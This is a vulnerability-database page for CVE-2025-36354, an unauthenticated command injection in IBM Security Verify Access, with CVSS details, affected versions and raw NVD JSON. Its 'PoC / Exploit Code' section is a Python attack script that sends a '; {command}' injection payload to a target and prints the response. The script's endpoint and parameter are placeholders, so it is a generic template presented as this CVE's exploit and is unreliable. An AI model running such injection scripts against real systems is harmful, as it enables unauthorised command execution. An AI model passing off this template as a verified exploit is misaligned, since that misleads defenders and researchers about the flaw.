Security Vulnerability Report
CVE-2025-36354 CVSS 7.3 HIGH

CVE-2025-36354

Published: 2025-10-06 17:16:05
Last Modified: 2025-12-15 19:23:22

Description

IBM Security Verify Access and IBM Security Verify Access Docker 10.0.0.0 through 10.0.9.0 and 11.0.0.0 through 11.0.1.0 could allow an unauthenticated user to execute arbitrary commands with lower user privileges on the system due to improper validation of user supplied input.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Weakness: CWE-78 (OS Command Injection)

Configurations (Affected Products)

cpe:2.3:a:ibm:security_verify_access:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:security_verify_access:10.0.9.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interim_fix1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interim_fix2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:security_verify_access_docker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:verify_identity_access:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:verify_identity_access:11.0.1.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:verify_identity_access_docker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:verify_identity_access_docker:11.0.1.0:-:*:*:*:*:*:* - VULNERABLE
IBM Security Verify Access 10.0.0.0 - 10.0.9.0
IBM Security Verify Access 11.0.0.0 - 11.0.1.0
IBM Security Verify Access Docker 10.0.0.0 - 10.0.9.0
IBM Security Verify Access Docker 11.0.0.0 - 11.0.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-36354 - IBM Security Verify Access Command Injection PoC
# Vulnerability: Unauthenticated command injection via improper input validation
# Affected: IBM Security Verify Access 10.0.0.0-10.0.9.0, 11.0.0.0-11.0.1.0
import requests
import sys

TARGET_URL = "https://target-ibm-verify-access.example.com"
VULNERABLE_ENDPOINT = "/<vulnerable_endpoint>"  # Replace with actual vulnerable endpoint


def exploit(target_url, command):
    """
    Exploit command injection in IBM Security Verify Access
    The vulnerability allows unauthenticated command execution
    with lower user privileges due to improper input validation.
    """
    # Inject OS command via user-supplied input parameter
    payload = f"; {command}"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0",
    }
    data = {
        "inputParam": payload  # Replace with actual vulnerable parameter name
    }
    try:
        response = requests.post(
            f"{target_url}{VULNERABLE_ENDPOINT}",
            data=data,
            headers=headers,
            verify=False,
            timeout=10,
        )
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text[:500]}")
        return response
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url> [command]")
        print(f"Example: {sys.argv[0]} https://target.example.com 'id'")
        sys.exit(1)
    target = sys.argv[1]
    cmd = sys.argv[2] if len(sys.argv) > 2 else "id"
    exploit(target, cmd)
```

References

https://www.ibm.com/support/pages/node/7247215 (Patch, Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-36354", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:05.127", "lastModified": "2025-12-15T19:23:22.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Security Verify Access and IBM Security Verify Access Docker 10.0.0.0 through 10.0.9.0 and 11.0.0.0 through 11.0.1.0 \n\n\n\ncould allow an unauthenticated user to execute arbitrary commands with lower user privileges on the system due to improper validation of user supplied input."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0.0", "versionEndExcluding": "10.0.9.0", "matchCriteriaId": "CCA4ADF8-014B-4A43-AE12-CC7D46B0F8BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:10.0.9.0:-:*:*:*:*:*:*", "matchCriteriaId": "9916DF0F-8A3E-4CB4-957F-286E168666A2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interim_fix1:*:*:*:*:*:*", "matchCriteriaId": "05FBA01C-DDCD-4B80-B14B-81DAB052CC8D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interim_fix2:*:*:*:*:*:*", "matchCriteriaId": "149CA168-1117-4B50-8F5A-B72D4BCC65F1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0.0", "versionEndExcluding": "10.0.9.0", "matchCriteriaId": "FFF4D7D4-0D01-44CA-84A2-2EA59802D1CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:-:*:*:*:*:*:*", "matchCriteriaId": "7E76C6CF-1E2A-403E-9C7F-619BE2057468"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:interim_fix1:*:*:*:*:*:*", "matchCriteriaId": "B8BF3374-6B03-4A25-9F4D-F88C091804C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:interim_fix2:*:*:*:*:*:*", "matchCriteriaId": "C8D09601-F55B-4307-8BEE-218F5CAC2138"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0.0", "versionEndExcluding": "11.0.1.0", "matchCriteriaId": "16595130-3A46-4DD1-9DAA-53E534306975"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access:11.0.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "4A7A934C-F8B6-44D1-9591-A3FDB86BEECB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access_docker:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0.0", "versionEndExcluding": "11.0.1.0", "matchCriteriaId": "81BD4D96-C9E9-422B-B18A-61ECFE711884"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access_docker:11.0.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "0C06D5AD-67DD-46FA-BDF7-39A2E0EAAF95"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7247215", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
```